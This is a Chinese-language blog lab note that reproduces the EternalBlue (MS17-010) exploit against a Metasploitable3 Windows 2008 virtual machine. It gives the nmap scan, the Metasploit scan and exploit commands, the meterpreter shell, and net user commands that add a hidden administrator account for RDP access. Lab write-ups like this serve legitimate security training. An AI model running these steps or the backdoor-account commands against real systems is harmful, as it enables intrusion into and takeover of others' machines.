Metasploitable3學習筆記--永恆之藍漏洞復現

漏洞描述:

Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠程代碼執行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。

影響版本:

目前已知受影響的Windows 版本包括但不限於:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

復現環境:

攻擊機:Kali2020.3(IP:192.168.88.143)

靶機:Metasploitable3Win2k8 (IP:192.168.88.140)

復現過程:

1、用nmap執行C段掃描

nmap -r 192.168.88.0/24

 

 

2、打開MSF

在終端輸入如下命令打開MSF終端:

msfconsole

 

 

3、搜索ms17_010模塊

msf6 > search ms17_010

 這裏可以得到幾個工具,其中auxiliary/scanner/smb/smb_ms17_010是永恆之藍掃描模塊,xploit/windows/smb/ms17_010_eternalblue是永恆之藍攻擊代碼,一般配合使用,前者先掃描,若顯示有漏洞,再進行攻擊。

 

4、執行掃描模塊

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.88.140
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

 

5、執行ms17_010攻擊模塊

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.88.140
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

 

成功彈回meterpreter會話,這也意味着我們已經滲透成功,拿到了目標主機的shell。

 

6、通過shell對靶機進一步控制

執行sysinfo,查看目標主機的系統信息。

 

執行shell,返回了shell

 

添加用戶,並將用戶添加到本地管理員組

C:\Windows\system32>net user 0pen1 123456 /add
C:\Windows\system32>net localgroup administrators 0pen1 /add

 

驗證用戶是否添加成功

C:\Windows\system32>net localgroup administrators

 

使用rdesktop連接靶機

wang@kali:~$ rdesktop 192.168.88.140

 

 

 

 

總結

到這裏本次永恆之藍復現就完成了,剩下的大家可以憑想象發揮了~

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章